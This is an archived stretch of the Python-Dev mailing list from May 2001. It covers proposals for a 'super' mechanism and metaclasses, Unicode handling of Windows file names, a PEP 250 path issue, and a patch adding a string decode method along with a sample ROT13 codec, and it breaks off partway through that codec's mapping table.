Your message of "Wed, 02 May 2001 14:48:20 +1200." <200105020248.OAA16329@s454.cosc.canterbury.ac.nz> References: <200105020248.OAA16329@s454.cosc.canterbury.ac.nz> Message-ID: <200105021523.KAA32340@cj20424-a.reston1.va.home.com> > > Except that sometimes you really do want x.__class__.__classdict__ to > > have priority (e.g. for "guarded" attributes). > > What's a "guarded" attribute? I meant an attribute that's implemented by a pair of get and set functions. This is very useful; my proposed design lets you define this more directly rather than requiring you to override __getattr__ and __setattr__. > > But the issue of backwards compatibility is a big one here > > I was thinking that, while this is still in the __future__, > the __dict__ attribute would be a pseudo-dict that, by > default, behaves like the union of the old __dict__ and > the __classdict__. Actually, I think that what's in the __dict__ is just perfect; it's the definition of getattr(classobject, name) where name is both an instance and a class method that causes trouble. --Guido van Rossum (home page: http://www.python.org/~guido/) From mal@lemburg.com Wed May 2 15:29:20 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Wed, 02 May 2001 16:29:20 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com> <3AF013ED.8A190FE2@lemburg.com> <200105021519.KAA32312@cj20424-a.reston1.va.home.com> Message-ID: <3AF019C0.716E6D35@lemburg.com> Guido van Rossum wrote: > > > Here's an implementation of what I currently use to track down > > the basemethod (taken from mx.Tools): > > How am I supposed to use this? > > I tried this: > > class B: > def foo(self): > print "B.foo" > > class C(B): > def foo(self): > print "C.foo" > B.foo(self) > print basemethod(self.foo) # Expect this to be B.foo This finds the basemethod of self.foo meaning the method overridden by D.foo. To get at the basemethod of C.foo, you'd have to call basemethod(self, C.foo) Note that the intent here is to be able to call basemethods even in case the defining class is only mixin class -- a very common situation at least in many of my applications (keeps inheritance trees shallow and increases readability of the code). > class D(C): > def foo(self): > print "D.foo" > C.foo(self) > > d = D() > d.foo() > > but the call to basemethod(self.foo) in C prints C.foo, not B.foo as > required. > > --Guido van Rossum (home page: http://www.python.org/~guido/) > > _______________________________________________ > Python-Dev mailing list > Python-Dev@python.org > http://mail.python.org/mailman/listinfo/python-dev -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From fredrik@effbot.org Wed May 2 15:15:58 2001 From: fredrik@effbot.org (Fredrik Lundh) Date: Wed, 2 May 2001 16:15:58 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> Message-ID: <002c01c0d312$6a195110$e46940d5@hagrid> thomas wrote: > > why not spell it out: > > > > self.__super__.foo(arg1, arg2) > > > > or > > > > self.super.foo(arg1, arg2) > > > > or > > > > super(self).foo(arg1, arg2) > > IMO we still need to specify the class, and there we are: > > super(self, MyClass).foo(arg1, arg2) isn't that the same as self.__class__ ? in which case super is something like: import new class super: def __init__(self, instance): self.instance = instance def __getattr__(self, name): for klass in self.instance.__class__.__bases__: member = getattr(klass, name, None) if member: if callable(member): return new.instancemethod(member, self.instance, klass) return member raise AttributeError(name) (I'm even more confused than my pythonware.com colleague) Cheers /F From Donald Beaudry Wed May 2 15:41:14 2001 From: Donald Beaudry (Donald Beaudry) Date: Wed, 02 May 2001 10:41:14 -0400 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> Message-ID: <200105021441.KAA08444@localhost.localdomain> Guido van Rossum wrote, > [Greg Ward, welcome back!] > > * 'super' is a magic object that only makes sense inside a 'def' > > inside a 'class' (at least for now; perhaps it could be generalized > > to work at class scope as well as method scope, but let's keep > > it simple) > > Yes, that's about the only way it can be made to work. The compiler > will have to (1) detect that 'super' is a free variable, and (2) make > it a local and initialize it with the proper magic. Or, to relieve > the burden from the symbol table, we could make super a keyword, at > the cost of breaking existing code. I'm not at all sure I like the idea of 'super'. It's far more magic that I am used to (coming from Python at least). Currently, we spell 'super' like this: class foo(bar): def __repr__(self): return bar.__repr__(self) # that's super! I like the explicit nature of it. As Guido points out however, this ends up being ambiguous when we try to make classes more "instance-like". Now, how do I like to spell super? class foo(bar): def __repr__(self): return bar._.__repr__(self) # now that's really super! or, for those who like the "keyword": class foo(bar): def __repr__(self): super = bar._ return super.__repr__(self) The trick here in the implementation of getattr on the '_'. It return a proxy object for the class. When attributes are accessed through it a different search path is taken. This path is the same path that would be taken by instance attribute look up. In my code, I refer to this object as the 'unbound instance'. Since accessing a function through this object will yield an unbound instance method, the name makes sense to me. -- Donald Beaudry Ab Initio Software Corp. 201 Spring Street donb@init.com Lexington, MA 02421 ...So much code, so little time... From thomas.heller@ion-tof.com Wed May 2 15:49:02 2001 From: thomas.heller@ion-tof.com (Thomas Heller) Date: Wed, 2 May 2001 16:49:02 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> <002c01c0d312$6a195110$e46940d5@hagrid> Message-ID: <075101c0d317$07516fe0$e000a8c0@thomasnotebook> > thomas wrote: > > > > why not spell it out: > > > > > > self.__super__.foo(arg1, arg2) > > > > > > or > > > > > > self.super.foo(arg1, arg2) > > > > > > or > > > > > > super(self).foo(arg1, arg2) > > > > IMO we still need to specify the class, and there we are: > > > > super(self, MyClass).foo(arg1, arg2) > > isn't that the same as self.__class__ ? in which case > super is something like: > > import new > > class super: > def __init__(self, instance): > self.instance = instance > def __getattr__(self, name): > for klass in self.instance.__class__.__bases__: > member = getattr(klass, name, None) > if member: > if callable(member): > return new.instancemethod(member, self.instance, klass) > return member > raise AttributeError(name) > No, it's not the same. Consider: class X: def test(self): print "test X" class Y(X): def test(self): print "test Y" super(self).test() class Z(Y): pass X().test() print Y().test() print Z().test() print This prints: test X test Y test X test Y test Y (more test Y lines deleted) Runtime error: maximum recursion depth exceeded This is because super(self).test for the Z() object should start the search in the X class, not in the Y class. Thomas From thomas.heller@ion-tof.com Wed May 2 15:53:17 2001 From: thomas.heller@ion-tof.com (Thomas Heller) Date: Wed, 2 May 2001 16:53:17 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> <002c01c0d312$6a195110$e46940d5@hagrid> Message-ID: <078f01c0d317$9f6a5b70$e000a8c0@thomasnotebook> This implementation of super works correctly: import new class super: def __init__(self, instance, klass): self.instance = instance self.klass = klass def __getattr__(self, name): for klass in (self.klass,) + self.klass.__bases__: member = getattr(klass, name, None) if member: if callable(member): return new.instancemethod(member, self.instance, klass) return member raise AttributeError(name) class X: def test(self): print "test X" class Y(X): def test(self): print "test Y" super(self, X).test() class Z(Y): pass X().test() print Y().test() print Z().test() print Thomas From Donald Beaudry Wed May 2 16:31:45 2001 From: Donald Beaudry (Donald Beaudry) Date: Wed, 02 May 2001 11:31:45 -0400 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com> <3AF01381.592AE31B@lemburg.com> <200105021511.KAA32271@cj20424-a.reston1.va.home.com> Message-ID: <200105021531.LAA08940@localhost.localdomain> Guido van Rossum wrote, > AFAIK, Smalltalk has only single inheritance, and so does Java, so > there 'super' is enough. Will we need to add a "::" operator to > Python??? Multiple inheritance introduces a potential wrinkle in my definition of the unbound instance. The problem is that search starts one level too high. That is in: class foo(b1, b2): def __repr__(self): super = b1._ #this one super = b2._ #or this one? return super.__repr__(self) we dont know which base class to choose as the starting point for the search. This problem already exist. Now, if we want to avoid it, this: class foo(b1, b2): def __repr__(self): super = foo.__super__ return super.__repr__(self) comes to mind. -- Donald Beaudry Ab Initio Software Corp. 201 Spring Street donb@init.com Lexington, MA 02421 ...Will hack for sushi... From Donald Beaudry Wed May 2 16:37:39 2001 From: Donald Beaudry (Donald Beaudry) Date: Wed, 02 May 2001 11:37:39 -0400 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> <002c01c0d312$6a195110$e46940d5@hagrid> Message-ID: <200105021537.LAA09063@localhost.localdomain> "Fredrik Lundh" wrote, > thomas wrote: > > > > why not spell it out: > > > > > > self.__super__.foo(arg1, arg2) > > > > > > or > > > > > > self.super.foo(arg1, arg2) > > > > > > or > > > > > > super(self).foo(arg1, arg2) > > > > IMO we still need to specify the class, and there we are: > > > > super(self, MyClass).foo(arg1, arg2) > > isn't that the same as self.__class__ ? in which case > super is something like: super is a lexically scoped concept. You cant ask the instance for it since it's value is different depending on in which it is needed Just as: class foo(bar): def __repr__(self): return self.__class__.__repr__(self) would get you into an infinite loop, while: class foo(bar): def __repr__(self): return bar.__repr__(self) wont. Now, dont go thinking that class foo(bar): def __repr__(self): return self.__class__.__base__[0].__repr__(self) will do you any good either ;) Because it wont! -- Donald Beaudry Ab Initio Software Corp. 201 Spring Street donb@init.com Lexington, MA 02421 ...So much code, so little time... From guido@digicool.com Wed May 2 18:02:19 2001 From: guido@digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 12:02:19 -0500 Subject: [Python-Dev] Unicode and the Windows file system. In-Reply-To: Your message of "Fri, 27 Apr 2001 00:26:39 +1000." References: Message-ID: <200105021702.MAA01317@cj20424-a.reston1.va.home.com> > Now that 2.1 is out the door, how do we feel about getting these Unicode > changes in? > > http://sourceforge.net/tracker/?func=detail&aid=410465&group_id=5470&atid=305470 No problem for me, although the context-sensitive semantics of the MBCS encoding still elude me. (Who cares, it's Windows. :-) Are you & MAL capable of sorting this out? Do you want me to add a +1 comment to the tracker? --Guido van Rossum (home page: http://www.python.org/~guido/) From gmcm@hypernet.com Wed May 2 17:01:20 2001 From: gmcm@hypernet.com (Gordon McMillan) Date: Wed, 2 May 2001 12:01:20 -0400 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: <200105021523.KAA32340@cj20424-a.reston1.va.home.com> References: Your message of "Wed, 02 May 2001 14:48:20 +1200." <200105020248.OAA16329@s454.cosc.canterbury.ac.nz> Message-ID: <3AEFF710.9471.8025D7EA@localhost> Hmmm. Some time ago, Tim asked the question: "Why do you wnat this stuff?". As far as I can recall, he got 2 answers: "So I don't have to 'initialize(Klass)'" and "me, too". I don't think those qualify as answers. Some time ago (cf, types-sig brouhaha of a couple years ago) I concluded that the only purpose for this stuff was __getattr__ and __setattr__ hacks. I reached this conclusion by going nutzo using (Guido's) metaclass hook, and studying the available uses of ExtensionClass (I could find no public usage of Don's elegant madness). I rather liked Guido's "Turtles all the way down" (but his description was so cryptic that my interpretation may have been a hallucination), and I suspect he's still headed that way. Nonetheless, I would like to see this discussion of the elegance of SmallTalk's incompatible model (and how to fudge it in Python) balanced by some discussion of the expected pragmatic benefits. (That's a different topic from subclassing types.) start-with-"if-God-wanted-metaclasses-he-wouldn't-have- invented-proxies"--ly y'rs - Gordon From fredrik@effbot.org Wed May 2 16:47:08 2001 From: fredrik@effbot.org (Fredrik Lundh) Date: Wed, 2 May 2001 17:47:08 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> <002c01c0d312$6a195110$e46940d5@hagrid> <200105021537.LAA09063@localhost.localdomain> Message-ID: <00a901c0d31f$2797a370$e46940d5@hagrid> Donald Beaudry wrote: > super is a lexically scoped concept. You cant ask the instance for it > since it's value is different depending on in which it is needed oh, you want people to be able to inherit from classes using super? guess we'll have to use sys._getframe().f_back.f_method.im_class instead, then ;-) (any special reason why frame objects don't contain a pointer to the corresponding function/method object?) Cheers /F From mal@lemburg.com Wed May 2 17:11:50 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Wed, 02 May 2001 18:11:50 +0200 Subject: [Python-Dev] Unicode and the Windows file system. References: <200105021702.MAA01317@cj20424-a.reston1.va.home.com> Message-ID: <3AF031C6.324D25D5@lemburg.com> Guido van Rossum wrote: > > > Now that 2.1 is out the door, how do we feel about getting these Unicode > > changes in? > > > > http://sourceforge.net/tracker/?func=detail&aid=410465&group_id=5470&atid=305470 > > No problem for me, although the context-sensitive semantics of the > MBCS encoding still elude me. (Who cares, it's Windows. :-) > > Are you & MAL capable of sorting this out? Do you want me to add a +1 > comment to the tracker? I'll take care of the parser marker stuff and Mark can do the rest ;-) -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From guido@digicool.com Wed May 2 18:17:50 2001 From: guido@digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 12:17:50 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Wed, 02 May 2001 17:47:08 +0200." <00a901c0d31f$2797a370$e46940d5@hagrid> References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> <002c01c0d312$6a195110$e46940d5@hagrid> <200105021537.LAA09063@localhost.localdomain> <00a901c0d31f$2797a370$e46940d5@hagrid> Message-ID: <200105021717.MAA01518@cj20424-a.reston1.va.home.com> > (any special reason why frame objects don't contain a > pointer to the corresponding function/method object?) Because (until now) there was no need. The frame needs to know about the code object, but the rest of the function's context is not needed. --Guido van Rossum (home page: http://www.python.org/~guido/) From mal@lemburg.com Wed May 2 19:13:17 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Wed, 02 May 2001 20:13:17 +0200 Subject: [Python-Dev] "data".decode(encoding) ?! Message-ID: <3AF04E3D.45AE4F4B@lemburg.com> We already have "data".encode(encoding) which encodes the string data by passing it through the encoder of the given encoding. Wouldn't it be worthwhile to add direct access to codec decoders through string methods as well ? (Note that this addition only makes sense for string objects, since Unicode cannot be decoded.) Also, would there be any objections adding some more standard codecs to the system ? I'm thinking of wrapping the binascii module APIs in form of codecs... -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From guido@digicool.com Wed May 2 20:18:26 2001 From: guido@digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 14:18:26 -0500 Subject: [Python-Dev] "data".decode(encoding) ?! In-Reply-To: Your message of "Wed, 02 May 2001 20:13:17 +0200." <3AF04E3D.45AE4F4B@lemburg.com> References: <3AF04E3D.45AE4F4B@lemburg.com> Message-ID: <200105021918.OAA03080@cj20424-a.reston1.va.home.com> > We already have "data".encode(encoding) which encodes the string data > by passing it through the encoder of the given encoding. > > Wouldn't it be worthwhile to add direct access to codec decoders > through string methods as well ? > > (Note that this addition only makes sense for string objects, > since Unicode cannot be decoded.) > > Also, would there be any objections adding some more standard > codecs to the system ? I'm thinking of wrapping the binascii > module APIs in form of codecs... Can you provide examples of where this can't be done using the existing approach? Code-bloat police anyone? --Guido van Rossum (home page: http://www.python.org/~guido/) From mal@lemburg.com Wed May 2 19:32:46 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Wed, 02 May 2001 20:32:46 +0200 Subject: [Python-Dev] "data".decode(encoding) ?! References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> Message-ID: <3AF052CE.E928BDA1@lemburg.com> Guido van Rossum wrote: > > > We already have "data".encode(encoding) which encodes the string data > > by passing it through the encoder of the given encoding. > > > > Wouldn't it be worthwhile to add direct access to codec decoders > > through string methods as well ? > > > > (Note that this addition only makes sense for string objects, > > since Unicode cannot be decoded.) > > > > Also, would there be any objections adding some more standard > > codecs to the system ? I'm thinking of wrapping the binascii > > module APIs in form of codecs... > > Can you provide examples of where this can't be done using the > existing approach? There is no existing elegant approach except hooking up to the codecs directly. Adding .decode() is really a matter of adding symmetry. Here are some example of how these two codec methods could be used: xmltext = binarydata.encode('base64') ... binarydata = xmltext.decode('base64') zzz = data.encode('gzip') ... data = zzz.decode('gzip') jpegimage = gifimage.decode('gif').encode('jpeg') mp3audio = wavaudio.decode('wav').encode('mp3') etc. Basically all content transfer encodings can take advantage of these two methods. It's not really code bloat, BTW, since the C API is there; the .decode() method would just expose it. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From guido@digicool.com Wed May 2 20:38:10 2001 From: guido@digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 14:38:10 -0500 Subject: [Python-Dev] "data".decode(encoding) ?! In-Reply-To: Your message of "Wed, 02 May 2001 20:32:46 +0200." <3AF052CE.E928BDA1@lemburg.com> References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> Message-ID: <200105021938.OAA03550@cj20424-a.reston1.va.home.com> > > Can you provide examples of where this can't be done using the > > existing approach? > > There is no existing elegant approach except hooking up to the > codecs directly. Adding .decode() is really a matter of adding > symmetry. Yes, but symmetry is good except when it isn't. :-) > Here are some example of how these two codec methods could > be used: > > xmltext = binarydata.encode('base64') > ... > binarydata = xmltext.decode('base64') > > zzz = data.encode('gzip') > ... > data = zzz.decode('gzip') > > jpegimage = gifimage.decode('gif').encode('jpeg') > > mp3audio = wavaudio.decode('wav').encode('mp3') > > etc. How would you do this currently? > Basically all content transfer encodings can take advantage of > these two methods. > > It's not really code bloat, BTW, since the C API is there; > the .decode() method would just expose it. Show me the patch and I'll decide whether it's code bloat. :-) --Guido van Rossum (home page: http://www.python.org/~guido/) From fredrik@effbot.org Wed May 2 19:20:24 2001 From: fredrik@effbot.org (Fredrik Lundh) Date: Wed, 2 May 2001 20:20:24 +0200 Subject: [Python-Dev] PEP 250 buglet Message-ID: <004b01c0d334$8f600a50$e46940d5@hagrid> PEP 250 suggests changing the sitedirs setup in site.py from sitedirs = [prefix] to sitedirs == [makepath(prefix, "lib", "site-packages")] on windows. it then goes on to say that This change does not preclude packages using the current location -- the change only adds a directory to sys.path, it does not remove anything. this isn't true (even after correcting the typo), since the sitedirs list isn't only added to the path; it's also used to look for PTH files. after this change, PTH files located under prefix will no longer be found. the following change works a bit better: sitedirs = [prefix, makepath(prefix, "lib", "site-packages")] Cheers /F From mal@lemburg.com Wed May 2 20:55:25 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Wed, 02 May 2001 21:55:25 +0200 Subject: [Python-Dev] "data".decode(encoding) ?! References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> Message-ID: <3AF0662D.48671B4E@lemburg.com> This is a multi-part message in MIME format. --------------891C60CC0A920DAE275D45C5 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Guido van Rossum wrote: > > > > Can you provide examples of where this can't be done using the > > > existing approach? > > > > There is no existing elegant approach except hooking up to the > > codecs directly. Adding .decode() is really a matter of adding > > symmetry. > > Yes, but symmetry is good except when it isn't. :-) > > > Here are some example of how these two codec methods could > > be used: > > > > xmltext = binarydata.encode('base64') > > ... > > binarydata = xmltext.decode('base64') > > > > zzz = data.encode('gzip') > > ... > > data = zzz.decode('gzip') > > > > jpegimage = gifimage.decode('gif').encode('jpeg') > > > > mp3audio = wavaudio.decode('wav').encode('mp3') > > > > etc. > > How would you do this currently? By looking up the codecs using the codec registry and then calling them directly. > > Basically all content transfer encodings can take advantage of > > these two methods. > > > > It's not really code bloat, BTW, since the C API is there; > > the .decode() method would just expose it. > > Show me the patch and I'll decide whether it's code bloat. :-) I've attached the patch. Due to a small reorganisation the patch is a little longer -- symmetry has its price at C level too ;-) -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ --------------891C60CC0A920DAE275D45C5 Content-Type: text/plain; charset=us-ascii; name="string.decode.patch" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="string.decode.patch" --- CVS-Python/Include/stringobject.h Sat Feb 24 10:30:49 2001 +++ Dev-Python/Include/stringobject.h Wed May 2 21:05:12 2001 @@ -105,10 +105,19 @@ extern DL_IMPORT(PyObject*) PyString_AsE PyObject *str, /* string object */ const char *encoding, /* encoding */ const char *errors /* error handling */ ); +/* Decodes a string object and returns the result as Python string + object. */ + +extern DL_IMPORT(PyObject*) PyString_AsDecodedString( + PyObject *str, /* string object */ + const char *encoding, /* encoding */ + const char *errors /* error handling */ + ); + /* Provides access to the internal data buffer and size of a string object or the default encoded version of an Unicode object. Passing NULL as *len parameter will force the string buffer to be 0-terminated (passing a string with embedded NULL characters will cause an exception). */ --- CVS-Python/Objects/stringobject.c Wed May 2 16:19:22 2001 +++ Dev-Python/Objects/stringobject.c Wed May 2 21:04:34 2001 @@ -138,42 +138,56 @@ PyString_FromString(const char *str) PyObject *PyString_Decode(const char *s, int size, const char *encoding, const char *errors) { - PyObject *buffer = NULL, *str; + PyObject *v, *str; + + str = PyString_FromStringAndSize(s, size); + if (str == NULL) + return NULL; + v = PyString_AsDecodedString(str, encoding, errors); + Py_DECREF(str); + return v; +} + +PyObject *PyString_AsDecodedString(PyObject *str, + const char *encoding, + const char *errors) +{ + PyObject *v; + + if (!PyString_Check(str)) { + PyErr_BadArgument(); + goto onError; + } if (encoding == NULL) encoding = PyUnicode_GetDefaultEncoding(); /* Decode via the codec registry */ - buffer = PyBuffer_FromMemory((void *)s, size); - if (buffer == NULL) - goto onError; - str = PyCodec_Decode(buffer, encoding, errors); - if (str == NULL) + v = PyCodec_Decode(str, encoding, errors); + if (v == NULL) goto onError; /* Convert Unicode to a string using the default encoding */ - if (PyUnicode_Check(str)) { - PyObject *temp = str; - str = PyUnicode_AsEncodedString(str, NULL, NULL); + if (PyUnicode_Check(v)) { + PyObject *temp = v; + v = PyUnicode_AsEncodedString(v, NULL, NULL); Py_DECREF(temp); - if (str == NULL) + if (v == NULL) goto onError; } - if (!PyString_Check(str)) { + if (!PyString_Check(v)) { PyErr_Format(PyExc_TypeError, "decoder did not return a string object (type=%.400s)", - str->ob_type->tp_name); - Py_DECREF(str); + v->ob_type->tp_name); + Py_DECREF(v); goto onError; } - Py_DECREF(buffer); - return str; + return v; onError: - Py_XDECREF(buffer); return NULL; } PyObject *PyString_Encode(const char *s, int size, @@ -1773,10 +1780,29 @@ string_encode(PyStringObject *self, PyOb return NULL; return PyString_AsEncodedString((PyObject *)self, encoding, errors); } +static char decode__doc__[] = +"S.decode([encoding[,errors]]) -> string\n\ +\n\ +Return a decoded string version of S. Default encoding is the current\n\ +default string encoding. errors may be given to set a different error\n\ +handling scheme. Default is 'strict' meaning that encoding errors raise\n\ +a ValueError. Other possible values are 'ignore' and 'replace'."; + +static PyObject * +string_decode(PyStringObject *self, PyObject *args) +{ + char *encoding = NULL; + char *errors = NULL; + if (!PyArg_ParseTuple(args, "|ss:decode", &encoding, &errors)) + return NULL; + return PyString_AsDecodedString((PyObject *)self, encoding, errors); +} + + static char expandtabs__doc__[] = "S.expandtabs([tabsize]) -> string\n\ \n\ Return a copy of S where all tab characters are expanded using spaces.\n\ If tabsize is not given, a tab size of 8 characters is assumed."; @@ -2347,10 +2373,11 @@ string_methods[] = { {"title", (PyCFunction)string_title, 1, title__doc__}, {"ljust", (PyCFunction)string_ljust, 1, ljust__doc__}, {"rjust", (PyCFunction)string_rjust, 1, rjust__doc__}, {"center", (PyCFunction)string_center, 1, center__doc__}, {"encode", (PyCFunction)string_encode, 1, encode__doc__}, + {"decode", (PyCFunction)string_decode, 1, decode__doc__}, {"expandtabs", (PyCFunction)string_expandtabs, 1, expandtabs__doc__}, {"splitlines", (PyCFunction)string_splitlines, 1, splitlines__doc__}, #if 0 {"zfill", (PyCFunction)string_zfill, 1, zfill__doc__}, #endif --------------891C60CC0A920DAE275D45C5-- From mal@lemburg.com Wed May 2 21:36:30 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Wed, 02 May 2001 22:36:30 +0200 Subject: [Python-Dev] "data".decode(encoding) ?! References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> Message-ID: <3AF06FCE.854D4DF7@lemburg.com> This is a multi-part message in MIME format. --------------5800C85BDAA2AC1AD23ED42E Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Here's a little fun codec to play with. It encodes the input using the ROT13 encoding (which is 1-1 and idempotent). The main difference over the existing codecs is that it returns a string rather than Unicode. To install it, simply place it in some directory on your Python path. Here's some sample output (Netscape can unscramble this BTW): """ Urer'f n yvggyr sha pbqrp gb cynl jvgu. Vg rapbqrf gur vachg hfvat gur EBG13 rapbqvat (juvpu vf 1-1 naq vqrzcbgrag). Gur znva qvssrerapr bire gur rkvfgvat pbqrpf vf gung vg ergheaf n fgevat engure guna Havpbqr. Gb vafgnyy vg, fvzcyl cynpr vg va fbzr qverpgbel ba lbhe Clguba cngu. """ -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ --------------5800C85BDAA2AC1AD23ED42E Content-Type: text/python; charset=us-ascii; name="rot_13.py" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="rot_13.py" #!/usr/local/bin/python2.1 """ Python Character Mapping Codec for ROT13. See http://ucsub.colorado.edu/~kominek/rot13/ for details. Written by Marc-Andre Lemburg (mal@lemburg.com). """#" import codecs ### Codec APIs class Codec(codecs.Codec): def encode(self,input,errors='strict'): return codecs.charmap_encode(input,errors,encoding_map) def decode(self,input,errors='strict'): return codecs.charmap_decode(input,errors,decoding_map) class StreamWriter(Codec,codecs.StreamWriter): pass class StreamReader(Codec,codecs.StreamReader): pass ### encodings module API def getregentry(): return (Codec().encode,Codec().decode,StreamReader,StreamWriter) ### Decoding Map decoding_map = codecs.make_identity_dict(range(256)) decoding_map.update({ 0x0041: 0x004e, 0x0042: 0x004f, 0x0043: 0x0050, 0x0044: 0x0051, 0x0045: 0x0052, 0x0046: 0x0053, 0x0047: 0x0054, 0x0048: 0x0055, 0x0049: 0x0056, 0x004a: 0x0057, 0x004b: 0x0058, 0x004c: 0x0059, 0x004d: 0x005a, 0x004e: 0x0041, 0x004f: 0x0042, 0x0050: 0x0043, 0x0051: 0x0044, 0x0052: 0x0045, 0x0053: 0x0046, 0x0054: 0x0047, 0x0055: 0x0048, 0x0056: 0x0049, 0x0057: 0x004a, 0x0058: 0x004b, 0x0059: 0x004c, 0x005a: 0x004d, 0x0061: 0x006e, 0x0062: 0x006f, 0x0063: 0x0070, 0x0064: 0x0071, 0x0065: 0x0072, 0x0066: 0x0073, 0x0067: 0x0074, 0x0068: 0x0075, 